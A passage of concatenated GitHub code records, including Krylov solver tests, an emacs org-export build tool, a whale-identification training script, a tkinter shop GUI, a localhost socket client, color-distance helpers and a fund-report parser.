np.diag([1.0e-3] + list(range(2, n + 1)))\n\n # Make sure the shapes are alright\n b = np.ones(shape)\n sol, _ = method(A, b)\n assert sol.shape == b.shape\n\n assert abs(np.sum(np.abs(sol)) - ref[0]) < tol * ref[0]\n assert abs(np.sqrt(np.dot(sol.T, sol)) - ref[1]) < tol * ref[1]\n assert abs(np.max(np.abs(sol)) - ref[2]) < tol * ref[2]\n\n\n@pytest.mark.parametrize(\n \"solver\",\n [krylov.cg, krylov.minres, krylov.gmres],\n)\ndef test_custom_inner_product(solver):\n tol = 1.0e-9\n n = 100\n A = np.diag([1.0e-3] + list(range(2, n + 1)))\n b = np.ones(n)\n\n def inner(x, y):\n assert x.shape == b.shape\n assert y.shape == b.shape\n w = 10 / np.arange(1, n + 1)\n return np.dot(x.T, w * y)\n\n sol, _ = solver(A, b, inner=inner)\n\n ref = 1004.1873775173957\n assert abs(np.sum(np.abs(sol)) - ref) < tol * ref\n ref = 1000.0003174916551\n assert abs(np.sqrt(np.dot(sol, sol)) - ref) < tol * ref\n ref = 999.9999999997555\n assert abs(np.max(np.abs(sol)) - ref) < tol * ref\n\n\n@pytest.mark.parametrize(\n \"solver\",\n [krylov.cg, krylov.minres, krylov.gmres],\n)\ndef test_custom_inner_product_nx1(solver):\n tol = 1.0e-9\n n = 100\n A = np.diag([1.0e-3] + list(range(2, n + 1)))\n b = np.ones((n, 1))\n\n def inner(x, y):\n assert x.shape == b.shape\n assert y.shape == b.shape\n w = 10 / np.arange(1, n + 1)\n return np.dot(x.T, w[:, None] * y)[0, 0]\n\n sol, _ = solver(A, b, inner=inner)\n\n ref = 1004.1873775173957\n assert abs(np.sum(np.abs(sol)) - ref) < tol * ref\n ref = 1000.0003174916551\n assert abs(np.sqrt(np.dot(sol.T, sol)) - ref) < tol * ref\n ref = 999.9999999997555\n assert abs(np.max(np.abs(sol)) - ref) < tol * ref\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_scipy_sparse(solver):\n n = 5\n a = np.linspace(1.0, 2.0, n)\n a[-1] = 1e-2\n\n A = scipy.sparse.spdiags(a, [0], n, n)\n b = np.ones(n)\n\n sol, info = solver(A, b, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_scipy_linear_operator(solver):\n n = 5\n a = np.linspace(1.0, 2.0, n)\n a[-1] = 1e-2\n\n A = scipy.sparse.linalg.LinearOperator((n, n), lambda x: a * x)\n b = np.ones(n)\n\n 
sol, info = solver(A, b, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n\n\n@pytest.mark.parametrize(\"solver\", [krylov.cg, krylov.minres, krylov.gmres])\ndef test_custom_linear_operator(solver):\n n = 5\n\n class MyLinearOperator:\n def __init__(self):\n self.a = np.linspace(1.0, 2.0, n)\n self.a[-1] = 1e-2\n self.shape = (n, n)\n self.dtype = float\n\n def __matmul__(self, x):\n return self.a * x\n\n A = MyLinearOperator()\n b = np.ones(n)\n\n sol, info = solver(A, b, tol=1.0e-12)\n assert info.resnorms[-1] <= 1.0e-12\n","repo_name":"ju-liu/krylov","sub_path":"tests/test_solvers.py","file_name":"test_solvers.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"38584384504","text":"#! /usr/bin/env waf\n'''A waf tool to perform org export.\n\nBy default it will execute an new instance of emacs for each export.\nThis can be slow and the emacs may lack the desired configuration. An\nalternative that address both of these is to use emacs daemon through\nemacsclient.\n\n waf configure --emacs-daemon=\"NAME\" [...]\n\nWhere NAME is the daemon naem. Eg when started as:\n\n emacs --daemon=myemacs\n\nThe --emacs-daemon=\"NAME\" may also be given at build time:\n\n waf --emacs-daemon=\"NAME\" --target=my-export-html\n\nYou may also run (server-start) inside a running emacs. If so, the\nname should be \"server\". Take caution, a large build may make the\nrunning emacs effectively unusable.\n\n'''\n\nimport time\nfrom waflib.Utils import to_list, subst_vars\nfrom waflib.Task import Task, TaskSemaphore\nfrom waflib.Logs import debug, info, error, warn\nfrom waflib import TaskGen\n\nclass org_export(Task):\n\n before = ['inst']\n\n export_file_name = None\n\n # Emacs will only write to a fixed file name, which then this task\n # may move to the target. But, two tasks making a file (of the\n # same extension) will collide. 
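# The krylov tests above only require an operator with .shape, .dtype and a
# matrix-vector product; the same diagonal operator can be handed to SciPy's
# own CG as an independent sanity check. Sketch only; the tolerance is
# arbitrary and the matrix here is symmetric positive definite by design.
import numpy as np
import scipy.sparse.linalg as spla

n = 5
a = np.linspace(1.0, 2.0, n)
A = spla.LinearOperator((n, n), matvec=lambda x: a * x)
b = np.ones(n)
x, info = spla.cg(A, b, atol=1.0e-12)
print(info == 0, np.allclose(a * x, b))   # True True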
\n semaphore = TaskSemaphore(1)\n\n def __init__(self, *k, **kw):\n Task.__init__(self, *k, **kw)\n self.org_linked_files_done = False\n\n def scan(self):\n\n node = self.inputs[0]\n deps = set()\n debug(f'org: SCANNING {node}')\n file_links = set()\n for line in node.read().split(\"\\n\"):\n\n efn = \"#+export_file_name:\"\n if line.lower().startswith(efn):\n self.export_file_name = line.split(\":\",1)[1].strip()\n debug(\"org: scan found \" + self.export_file_name)\n continue\n\n pre = \"#+include:\"\n if line.lower().startswith(pre):\n fname = line[len(pre):].strip()\n fname = fname.split(\" \")[0]\n dep = node.parent.find_resource(fname)\n if dep:\n debug(f\"org: scan of {node} dependency found: {fname}\")\n deps.add(dep)\n else:\n debug(f\"org: scan of {node} dependency not found: {fname}\") \n\n for word in line.split(' '):\n if word.startswith (\"[[\"):\n word = word[2:].split(\"]\")[0]\n chunks = word.split(\":\")\n # debug(f'org: PARSED chunks={chunks}')\n if len(chunks) < 1:\n continue\n if chunks[0] != \"file\":\n continue\n flink = chunks[1]\n if flink.endswith(\".org\"):\n continue\n file_links.add(flink)\n\n # file_links available in raw_deps\n return (list(deps),list(file_links))\n\n def runnable_status(self):\n 'Install any linked files'\n ret = super(org_export, self).runnable_status() \n if self.org_linked_files_done:\n return ret\n\n bld = self.generator.bld\n flinks = bld.raw_deps.get(self.uid(), [])\n # debug(f'org: BLD: {type(bld)} {bld}')\n top_dir = bld.root.find_dir(bld.top_dir)\n node = self.inputs[0]\n outnode = self.outputs[0]\n fnodes = []\n debug(f'org: SCAN: {node} -> {outnode}')\n for flink in flinks:\n if not flink.strip():\n continue\n if node.parent.find_dir(flink):\n debug(f'org: SCAN: ignoring linked directory {flink}')\n continue\n fnode = node.parent.find_resource(flink)\n if not fnode:\n warn(f'org: SCAN: failed to find {flink} needed by {fnode}')\n continue\n debug(f'org: SCAN: found link: {flink} as {fnode}')\n fnodes.append(fnode)\n if fnodes:\n debug(f'org: SCAN: {node} installing ({len(fnodes)}) to {bld.env.DOCS_INSTALL_PATH} relative to {top_dir}: {fnodes}')\n bld.install_files(bld.env.DOCS_INSTALL_PATH, fnodes,\n cwd=top_dir, relative_trick=True, postpone=False)\n self.org_linked_files_done = True\n return ret\n\n def run(self):\n onode = self.inputs[0]\n enode = self.outputs[0]\n\n dotext = '.' 
+ self.func.split(\"-\")[-1]\n\n efn = self.export_file_name\n if efn:\n if not efn.endswith(dotext):\n efn += dotext\n tmp = onode.parent.make_node(efn)\n else:\n tmp = onode.parent.make_node(onode.name.replace('.org', dotext))\n\n debug(f\"org: emacs will produce: {tmp}\")\n\n if 'EMACSCLIENT' in self.env and self.env.EMACS_DAEMON:\n cmd = \"\"\"${EMACSCLIENT} -s \"${EMACS_DAEMON}\" -e '(progn (find-file \"%s\") (%s))' > /dev/null 2>&1\"\"\" % \\\n (onode.abspath(), self.func)\n else:\n cmd = \"${EMACS} %s --batch -f %s\" % (onode.abspath(), self.func)\n if tmp != enode:\n debug(f\"org: will move {tmp} to {enode}\")\n move = \"mv %s %s\" % (tmp, enode.abspath())\n cmd += \" && \" + move\n cmd = subst_vars(cmd, self.env)\n debug(f'org: COMMAND: {cmd}')\n return self.exec_command(cmd, shell=True)\n \n\nclass org_export_html(org_export):\n func = \"org-html-export-to-html\"\n\nclass org_export_pdf(org_export):\n func = \"org-latex-export-to-pdf\"\n\n\n@TaskGen.feature(\"org2html\", \"org2pdf\")\n@TaskGen.before('process_source')\ndef transform_source(tgen):\n tgen.inputs = tgen.to_nodes(getattr(tgen, 'source', []))\n\n\n@TaskGen.extension('.org')\ndef process_org(tgen, node):\n \n tgt = getattr(tgen, 'target', [])\n if isinstance(tgt, str):\n tgt = tgen.bld.path.find_or_declare(tgt)\n tgt = tgen.to_nodes(tgt)\n\n if 'org2html' in tgen.features:\n tgt = tgt or node.change_ext(\".html\")\n tsk = tgen.create_task(\"org_export_html\", node,tgt)\n\n if 'org2pdf' in tgen.features:\n tgt = tgt or node.change_ext(\".pdf\")\n tsk = tgen.create_task(\"org_export_pdf\", node, tgt)\n\n\ndef options(opt):\n opt.add_option(\"--emacs-daemon\", default=None, type=str,\n help=\"Given name of emacs daemon to use via emacsclient for org export. If none, use emacs directly (which is slower and may not pick up your config) [default=None], Note default daemon is called 'server'\")\n\ndef configure(cfg):\n cfg.find_program(\"emacs\", var=\"EMACS\")\n cfg.find_program(\"emacsclient\", var=\"EMACSCLIENT\", mandatory=False)\n\n cfg.env.EMACS_DAEMON = cfg.options.emacs_daemon\n\ndef build(bld):\n emacsd = getattr(bld.options, 'emacs_daemon')\n if emacsd is not None:\n bld.env.EMACS_DAEMON = emacsd\n","repo_name":"rennney/wire-cell-toolkit","sub_path":"waft/org.py","file_name":"org.py","file_ext":"py","file_size_in_byte":6678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"11610963489","text":"import numpy as np\nimport os\nimport utils.data_manipulation as dm # utils is a package I am putting together of useful functions\nimport utils.sbatch_scripts as ss\n\n\n\n# In Greg Field's data :::\n# Cell Types : Num Cells\n# ------------------------------\n# offBriskTransient : 55 cells\n# offBriskSustained : 43 cells\n# onBriskTransient : 39 cells\n# offExpanding : 13 cells\n# offTransient : 4 cells\n# onBriskSustained : 6 cells\n# onTransient : 7 cells\n# dsOnoffDown : 7 cells\n# dsOnoffRight : 3 cells\n# dsOnoffLeft : 3 cells\n# dsOnoffUp : 2 cells\n\n\n#\ndirHomeLoc, dirScratch = dm.set_dir_tree()\n\n# Parameters we can loop over.\nstims = ['NatMov']#,'Wnoise']\ncell_types = ['allCells'] \ncellSubTypeCombinations = [ ['offBriskTransient'], ['offBriskTransient','offBriskSustained'], ['offBriskTransient','onBriskTransient'] ] # a list of lists. 
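# Stripped of the waf machinery, the export the task above performs boils
# down to one of the two commands below. A sketch only; the file name is a
# placeholder, and the daemon variant mirrors the record's own template.
import subprocess

def org_to_html(org_path, daemon=None):
    if daemon:
        # emacsclient against a running daemon: faster, and picks up your config.
        expr = '(progn (find-file "%s") (org-html-export-to-html))' % org_path
        cmd = ["emacsclient", "-s", daemon, "-e", expr]
    else:
        # One-shot batch Emacs, as in the non-daemon branch of run().
        cmd = ["emacs", org_path, "--batch", "-f", "org-html-export-to-html"]
    return subprocess.run(cmd, check=True)

# org_to_html("notes.org")  # writes notes.html next to notes.org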
Each internal list is a combination of cell sub types to consider as a group to find Cell Assemblies within them.\n#cellSubTypeCombinations = [ ['offBriskTransient','onBriskTransient'] ]\nnum_test_samps_4xValS \t= [1] #[1, 10, 100] \nmodel_CA_overcompleteness = [1] \t\t# [1,2] \t# how many times more cell assemblies we have than cells (1 means complete - N=M, 2 means 2x overcomplete)\nSW_bins = [2]#, 2,1,0] \t\t\t\t\t# ms. Build up spikewords from groups of cells in the same trial that fire within SW_bins of eachother.\nlearning_rates = [0.5] #[1.0, 0.5, 0.1]\nlRateScaleS = [[1., 0.1, 0.1]]# , [1., 0.1, 1.] ] # Multiplicative scaling to Pia,Pi,Q learning rates. Can set to zero and take Pi taken out of model essentially.\n\n\n\nyLo_Vals \t= [0] #[1] \t\t# If |y|<=yLo, then we force the z=0 inference solution and change Pi. This defines cells assemblies to be more than 1 cell.\nyHi_Vals\t= [1000] \t\t# If |y|>=yHi, then we assume at least 1 CA is on and disallow z=0 inference solution and change Pia.\nyMinSWs \t= [1]\t\t\t# DOING BELOW THING WITH YYY inside pgm functions. --> (set to 0, so does nothing) \n\t\t\t\t\t\t\t\t# Only look at spikewords that have more active cells than yLo for EM learning. That is, ignore |y|0.5)==ones[:batch_size].byte()).float().mean().item(), n=batch_size)\n\t\tacc.update(((torch.sigmoid(negative.view(-1))>0.5)==zeros[:batch_size].byte()).float().mean().item(), n=batch_size)\n\n\t\ttorch.cuda.synchronize()\n\t\tbatch_time.update(time.time() - end)\n\t\tpbar.set_postfix(loss=losses.avg, acc=acc.avg)\n\t\tpbar.update(1)\n\t\tend = time.time()\n\t\tinputs = prefetcher.next_batch()\n\t\n\tpbar.close()\n\tif scheduler is not None:\n\t\tscheduler.step()\n\n\tlogger.info(\"TRAIN Epoch: %d Loss: %.2f Acc: %.2f Batch Time: %.2fs Data Time: %.2fs\" % (epoch+1, losses.avg, acc.avg, batch_time.avg, data_time.avg))\n\ndef eval_loop(epoch, loaders, model, criterion, config, logger):\n\tbatch_time = AverageMeter()\n\ttotal_images = len(loaders[\"train\"].dataset)\n\tnum_images = loaders[\"train\"].sampler.indices.size(0)\n\tnum_test_images = loaders[\"test\"].sampler.indices.size(0)\n\tmodel.eval()\n\tpbar = tqdm(desc=f\"TRAIN EVAL Epoch {epoch+1}\", total=len(loaders[\"train\"]))\n\tprefetcher = d.Prefetcher(loaders[\"train\"])\n\twith torch.no_grad():\n\t\tbatch_i = -1\n\t\tinputs, targets = prefetcher.next_batch()\n\n\t\tend = time.time()\n\t\ttrain_labels = torch.zeros(len(loaders[\"train\"]), config.EVAL_BATCH_SIZE).cuda().long()\n\t\t# First num_images are train predictions, the rest (num_test_images) are test predictions\n\t\tpredictions = torch.zeros(len(loaders[\"train\"])+len(loaders[\"test\"]), config.EVAL_BATCH_SIZE, config.OUT_DIM).cuda()\n\t\twhile inputs is not None:\n\t\t\tbatch_i += 1\n\t\t\tpreds = model.features(inputs)\n\t\t\tif preds.size(0) < config.EVAL_BATCH_SIZE:\n\t\t\t\tpredictions[batch_i][:preds.size(0)].add_(preds)\n\t\t\t\ttrain_labels[batch_i][:targets.size(0)].add_(targets.long())\n\t\t\telse:\n\t\t\t\tpredictions[batch_i].add_(preds)\n\t\t\t\ttrain_labels[batch_i].add_(targets.long())\n\n\t\t\ttorch.cuda.synchronize()\n\t\t\tbatch_time.update(time.time() - end)\n\t\t\tend = time.time()\n\t\t\tinputs, targets = prefetcher.next_batch()\n\t\t\tpbar.set_postfix()\n\t\t\tpbar.update(1)\n\t\n\t\tpbar.close()\n\t\tpbar = tqdm(desc=f\"TEST EVAL Epoch {epoch+1}\", total=len(loaders[\"test\"]))\n\t\tprefetcher = d.Prefetcher(loaders[\"test\"])\n\t\tinputs, targets = prefetcher.next_batch()\n\n\t\tend = time.time()\n\t\ttest_labels = 
torch.zeros(len(loaders[\"test\"]), config.EVAL_BATCH_SIZE).cuda().long()\n\t\ttest_i = -1\n\t\twhile inputs is not None:\n\t\t\tbatch_i += 1\n\t\t\ttest_i += 1\n\t\t\tpreds = model.features(inputs)\n\t\t\tif preds.size(0) < config.EVAL_BATCH_SIZE:\n\t\t\t\tpredictions[batch_i][:preds.size(0)].add_(preds)\n\t\t\t\ttest_labels[test_i][:targets.size(0)].add_(targets.long())\n\t\t\telse:\n\t\t\t\tpredictions[batch_i].add_(preds)\n\t\t\t\ttest_labels[test_i].add_(targets.long())\n\n\t\t\ttorch.cuda.synchronize()\n\t\t\tbatch_time.update(time.time() - end)\n\t\t\tend = time.time()\n\t\t\tinputs, targets = prefetcher.next_batch()\n\t\t\tpbar.set_postfix()\n\t\t\tpbar.update(1)\n\tpbar.close()\n\n\ttrain_predictions = predictions[:len(loaders[\"train\"])].view(-1, config.OUT_DIM)[:num_images]\n\ttest_predictions = predictions[len(loaders[\"train\"]):].view(-1, config.OUT_DIM)[:num_test_images]\n\tpredictions = torch.zeros(total_images, config.OUT_DIM).cuda()\n\tpredictions[:num_images].add_(train_predictions)\n\tpredictions[num_images:].add_(test_predictions)\n\tdel inputs, targets, train_predictions, test_predictions, prefetcher\n\ttorch.cuda.empty_cache()\n\n\ttrain_labels = train_labels.view(-1)[:num_images]\n\ttest_labels = test_labels.view(-1)[:num_test_images]\n\t#breakpoint()\n\thead_batch_size = 256*config.EVAL_BATCH_SIZE\n\tloader = thd.DataLoader(thd.TensorDataset(predictions[:num_images]), batch_size=head_batch_size, shuffle=False)\n\tmatrix = torch.zeros(total_images, num_images).cuda()\n\twith torch.no_grad():\n\t\tfor i, p in enumerate(tqdm(predictions, desc=f\"HEAD EVAL\", total=total_images)):\n\t\t\tp = p.expand(num_images, predictions.size(1))\n\t\t\tif i < num_images-1:\n\t\t\t\ti += 1\n\t\t\t\t#breakpoint()\n\t\t\t\ttry:\n\t\t\t\t\ttmp = torch.sigmoid(model.head(p[i:], predictions[i:num_images])).view(-1)\n\t\t\t\texcept:\n\t\t\t\t\tprint(i)\n\t\t\t\t\tbreakpoint()\n\t\t\t\tmatrix[i,i:].add_(tmp)\n\t\t\telif i >= num_images:\n\t\t\t\ttmp = torch.sigmoid(model.head(p, predictions[:num_images])).view(-1)\n\t\t\t\tmatrix[i].add_(tmp)\n\t\n\tmatrix[:num_images,:] = matrix[:num_images,:].add(matrix[:num_images,:].t())\n\tvalues, indices = matrix.topk(6, 1, largest=True)\n\tpred_targets = train_labels[indices]\n\tunique_preds = unique(pred_targets)\n\tunique_preds[:,-1].mul_((pred_targets.min(1)[0] == 0).long())\n\taccuracies = topk_accuracy_preds(unique_preds[:num_images], train_labels, topk=(1,3,5))\n\tlogger.info(\"TRAIN EVAL Epoch: %d Top-1: %.2f Top-3 %.2f Top-5 %.2f\" % ((epoch+1,) + tuple(accuracies)))\n\taccuracies = topk_accuracy_preds(unique_preds[num_images:], test_labels, topk=(1,3,5))\n\tlogger.info(\"TEST EVAL Epoch: %d Top-1: %.2f Top-3 %.2f Top-5 %.2f\" % ((epoch+1,) + tuple(accuracies)))\n\ndef single_run(dataset, model, config, logger, run_num=0):\n\tstart = time.time()\n\tcriterion = load_criterion(config, logger)\n\toptimizer = load_optimizer(model, config, logger)\n\tscheduler = optim.lr_scheduler.StepLR(optimizer, 10, gamma=0.1)\n\n\tif config.MIXUP:\n\t\tlogger.info(f\"Using mixup with alpha={config.ALPHA}\")\n\t\tmixup = Mixup(config.ALPHA)\n\telse:\n\t\tmixup = None\n\n\tloaders = get_loaders(dataset, config, logger)\n\ttrain_loader = get_loaders(dataset, config, logger, n=config.DATASET_N)[\"train\"]\n\tfor epoch in range(config.EPOCHS):\n\n\t\ttrain_loop(epoch, train_loader, model, criterion, optimizer, config, logger, mixup=mixup, scheduler=scheduler)\n\n\t\tif (epoch+1) % config.EVAL_INTERVAL == 0:\n\t\t\teval_loop(epoch, loaders, model, criterion, 
config, logger)\n\n\t\tif config.DATASET_N == 2 and ((epoch+1) % config.REINDEX_INTERVAL) == 0 and (epoch+1) < config.EPOCHS:\n\t\t\tlogger.info(f\"Reindexing dataset at epoch {epoch+1}\")\n\t\t\ttrain_loader = get_loaders(dataset, config, logger, n=config.DATASET_N)[\"train\"]\n\t\n\tend = time.time() - start\n\tlogger.info(\"Run %d finished at %dmin %.2fs\" % (run_num, end // 60, end % 60))\n\ndef cross_validate(dataset, model, config, logger):\n\tkfold = KFold(n_splits=5, random_state=config.SEED)\n\n\tfor split_num, (train_idx, test_idx) in enumerate(kfold.split(dataset.df.index.values)):\n\t\tlogger.info(f\"Running split {split_num}\")\n\t\tdataset.reset_index(train_idx, test_idx)\n\t\tsingle_run(dataset, model, config, logger, run_num=split_num)\n\ndef main(args):\n\tglobal config\n\tconfig = load_config(args.config_file)\n\tconfig.NW = args.num_workers\n\tconfig.MULTI_GPU = args.multi_gpu\n\tconfig.CV = args.cross_validate\n\tconfig.MIXUP = args.mixup\n\tlogger = setup_logger(args.no_snaps)\n\tif not args.no_snaps:\n\t\tsave_config(config)\n\n\tlogger.info(f\"Setting seed {config.SEED}\")\n\tset_seed(config.SEED)\n\n\tdataset = get_dataset(config, logger)\n\tmodel = load_model(config, logger)\n\n\tif config.CV:\n\t\tcross_validate(dataset, model, config, logger)\n\telse:\n\t\tsingle_run(dataset, model, config, logger)\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description=\"Training CLI\")\n\tparser.add_argument(\"config_file\", metavar=\"FILEPATH\", type=str, help=\"Config file.\")\n\tparser.add_argument(\"--mixup\", action=\"store_true\", help=\"Flag whether to prevent mixup.\")\n\tparser.add_argument(\"-cv\", \"--cross_validate\", action=\"store_true\", help=\"Flag whether to use cross validation.\")\n\tparser.add_argument(\"--no_snaps\", action=\"store_true\", help=\"Flag whether to prevent from storing snapshots.\")\n\tparser.add_argument(\"-nw\", \"--num_workers\", metavar=\"INT\", type=int, default=6, help=\"Number of processes (workers).\")\n\tparser.add_argument(\"--gpu_device\", metavar=\"INT\", type=int, default=None, help=\"ID of a GPU to use when multiple GPUs are available.\")\n\tparser.add_argument(\"--multi_gpu\", action=\"store_true\", help=\"Flag whether to use all available GPUs.\")\n\targs = parser.parse_args()\n\n\tif args.gpu_device is not None:\n\t\ttorch.cuda.set_device(args.gpu_device)\n\n\tmain(args)\n","repo_name":"danielhavir/whale-identification","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":16329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5269624899","text":"from tkinter import *\r\nfrom main import myBasket\r\nfrom main import myWarehouse\r\nfrom gui_class import gui_class\r\n\r\nwindow = Tk()\r\nwindow.geometry(\"750x600\")\r\nmyGUI = gui_class()\r\n\r\nwindow.title(\"Main Menu\")\r\nicon = PhotoImage(file='H:\\\\Framework\\\\Uebung_1\\\\warehouse1234\\\\feelsgoodman.png')\r\nwindow.iconphoto(True, icon)\r\n\r\ndef label_reload():\r\n upText = myBasket.get_total_item_quantity()\r\n number_products_label.configure(text=upText)\r\n number_products_label.after(400, label_reload)\r\n\r\ndef label_reload2():\r\n upText2 = myBasket.get_total_basket_cost()\r\n total_cost_label.configure(text=upText2)\r\n total_cost_label.after(400, label_reload2)\r\n\r\nfor z in myWarehouse.cat_list:\r\n Button(window, text=z, command= lambda ztemp=z : myGUI.open_new_cat_window(ztemp), padx=30, 
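# The verification accuracy in the training loop above thresholds a sigmoid
# at 0.5 and compares against hard labels; the same computation in isolation,
# with random logits standing in for the Siamese head's outputs.
import torch

logits = torch.randn(8)
labels = torch.randint(0, 2, (8,))
preds = (torch.sigmoid(logits) > 0.5).long()
accuracy = (preds == labels).float().mean().item()
print(accuracy)   # fraction of pairs classified correctly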
pady=20).grid(row=myGUI.grid_sorter_y(myWarehouse.cat_list.index(z)), column=myGUI.grid_sorter_x(myWarehouse.cat_list.index(z)))\r\n\r\nexit_button = Button(window, text=\"Programm verlassen\", command=window.destroy)\r\n\r\nnumber_products_label = Label(window, text=myBasket.get_total_item_quantity(), padx=30, pady=30)\r\ntotal_cost_label = Label(window, text=myBasket.get_total_basket_cost(), padx=30, pady=30)\r\nclear_basket_button = Button(window, text=\"Clear Basket\", command= lambda : [myWarehouse.return_list_to_warehouse(myBasket.basket),myBasket.reset_basket()])\r\ngo_to_basket_button = Button(window, text=\"Go to basket\", command=myGUI.go_to_basket_window)\r\nLabel(window, text=\"current item quantity:\",padx=30, pady=30).grid(row=0, column=4)\r\nLabel(window, text=\"current total cost:\",padx=30, pady=30).grid(row=1, column=4)\r\nwarehouse_products = Button(window, text= \"show products\", command= myWarehouse.show_stock, padx=30, pady=30)\r\nbasket_products = Button(window, text= \"show products\", command= myBasket.show_basket, padx=30, pady=30)\r\n\r\n\r\nexit_button.grid(row=3, column=2)\r\n\r\nnumber_products_label.grid(row=0, column=5)\r\ntotal_cost_label.grid(row=1, column=5)\r\nclear_basket_button.grid(row=1, column=6)\r\ngo_to_basket_button.grid(row=0, column=6)\r\nexit_button.grid(row=2, column=6)\r\nwarehouse_products.grid(row=3, column=6)\r\nbasket_products.grid(row=4, column=6)\r\n\r\nlabel_reload()\r\nlabel_reload2()\r\n\r\nwindow.mainloop()","repo_name":"viertje/private_stuff","sub_path":"uebung_2/warehouse1234/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8047854209","text":"#coding:utf-8\nimport os\nimport time\n# for windows\nos.system('cls')\n#os.system(\"ls\")\ntime.sleep(0.5)\n\nimport socket\n\nhost, port = ('localhost', 5566)\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntry:\n \n socket.connect((host, port))\n print(\"Client connecté !\")\n data = \"Bonjour Serveur, je suis le Client !:\"\n data = data.encode(\"utf8\")\n socket.sendall(data)\n \nexcept: #ConnectionRefusedError (exemple d'erreur)\n print(\"Connexion au serveur échouée !\")\nfinally:\n socket.close()\n\n","repo_name":"lxkrv/Formation_Python","sub_path":"33-Sockets-client.py","file_name":"33-Sockets-client.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36721301265","text":"from math import sqrt\n\n\ndef get_deltas(x, y):\n x = list(map(int, x))\n y = list(map(int, y))\n dr = (x[0] - y[0])\n dg = (x[1] - y[1])\n db = (x[2] - y[2])\n return dr, dg, db\n\n\ndef luminance_distance(x, y):\n r = (int(x[0]) + int(y[0])) / 2\n dr, dg, db = get_deltas(x, y)\n return sqrt((2 + r / 256) * dr ** 2 + 4 * dg ** 2 + (2 * ((255 - r) / 256)) * db ** 2)\n\n\nmax_luminance = luminance_distance([0, 0, 0], [255, 255, 255])\n\n\ndef euclidean_distance(x, y):\n dr, dg, db = get_deltas(x, y)\n return sqrt(dr ** 2 + dg ** 2 + db ** 2)\n\n\nmax_euclidean = euclidean_distance([0, 0, 0], [255, 255, 255])\n\n\ndef euclidean_similarity(x, y):\n dr, dg, db = get_deltas(x, y)\n return max_euclidean - sqrt(dr ** 2 + dg ** 2 + db ** 2)\n\n\ndef euclidean_similarity_normalized(x, y):\n return euclidean_similarity(x, y) / max_euclidean\n\n\ndef luminance_similarity(x, y):\n r = (int(x[0]) + int(y[0])) / 2\n dr, dg, db = get_deltas(x, y)\n return max_luminance - sqrt((2 + r 
/ 256) * dr ** 2 + 4 * dg ** 2 + (2 * ((255 - r) / 256)) * db ** 2)\n\n\ndef luminance_similarity_normalized(x, y):\n return luminance_similarity(x, y) / max_luminance\n\n\ndistances = {\n \"euclidean\": euclidean_distance,\n \"luminance\": luminance_distance,\n \"euclidean_sim\": euclidean_similarity,\n \"luminance_sim\": luminance_similarity,\n \"luminance_sim_norm\": luminance_similarity_normalized,\n \"euclidean_sim_norm\": euclidean_similarity_normalized\n}\n","repo_name":"lnghrdntcr/Graph-Based-Image-Segmentation","sub_path":"libs/linalg.py","file_name":"linalg.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39072024859","text":"# -*- coding: utf-8 -*-\n'''\nDESCRIPTION\n-----------\nThis is a module to \n1.extract the info about fund code, report date, filed date,\nfrom the title and path of a report;\n2. aggregate all info into a single panel data format, and;\n3. export as an excel file\n\nCONTENTS\n--------\n- panel_info_extractor\n\nOTHER INFO.\n-----------\n- Last upate: R4/8/18(Moku)\n- Author: GOTO Ryusuke \n- Contact: \n - Email: yuhang1012yong@link.cuhk.edu.hk (preferred)\n - WeChat: L13079237\n\n'''\n\nimport os\nfrom joblib import Parallel, delayed\nimport pandas as pd\nimport numpy as np\nimport re\nfrom tqdm import tqdm\nfrom utils import num_cn2eng, get_type\n\nclass panel_info_extractor: \n def __init__(self,\n code_info_dict_path: str, \n all_file_path: str):\n \n self.all_file_path = all_file_path\n \n # initialise the fund info dict, which can be used to match fund code to some other fund info\n raw_dict = pd.read_csv(code_info_dict_path, encoding = 'gbk')\n raw_dict.columns = ['code','name', 'inv_typeI', 'inv_type_II', 'fund_type']\n code_info_dict = dict([(raw_dict.iloc[idx,0].split('.')[0], raw_dict.iloc[idx,:]) for idx in range(len(raw_dict))])\n self.code_info_dict = code_info_dict\n \n self.code_list = os.listdir(all_file_path)\n self.code_file_path_dict = dict([(code, all_file_path + '/' + code) for code in self.code_list])\n \n def process_single_code_info(self,code: str):\n code_file_path = self.code_file_path_dict[code]\n code_file_list = os.listdir(code_file_path)\n \n report_info_df = pd.DataFrame(columns = ['file_name','report_type', 'year', 'quarter',\n 'date','info','type',\n 'report_year', 'month', 'day'])\n \n year_detector = re.compile(r'[0-9,一,二,三,四,五,六,七,八,九,零]{4}年')\n quarter_detector = re.compile(r'[1-4,一,二,三,四]季')\n annual_detector = re.compile(r'年[度,报]')\n mid_detector = re.compile(r'(半年|中期)')\n month_detector = re.compile(r'年[0-9,一,二,三,四,五,六,七,八,九,十]{1,2}月')\n \n for file in code_file_list:\n if '摘要' in file: continue\n \n single_report_info_df = pd.DataFrame(columns = ['file_name','report_type', 'year', 'quarter',\n 'date','info','type',\n 'report_year', 'month', 'day'])\n single_report_info_df.loc[0,'file_name'] = file\n \n report_date = file.split('_')[1].split('.')[0]\n single_report_info_df.loc[0,'date'] = report_date\n single_report_info_df.loc[0,['report_year', 'month', 'day']] = [int(num) for num in report_date.split('-')]\n \n title = file\n year = re.findall(year_detector, title)\n quarter = re.findall(quarter_detector, title)\n annual = re.findall(annual_detector, title)\n mid = 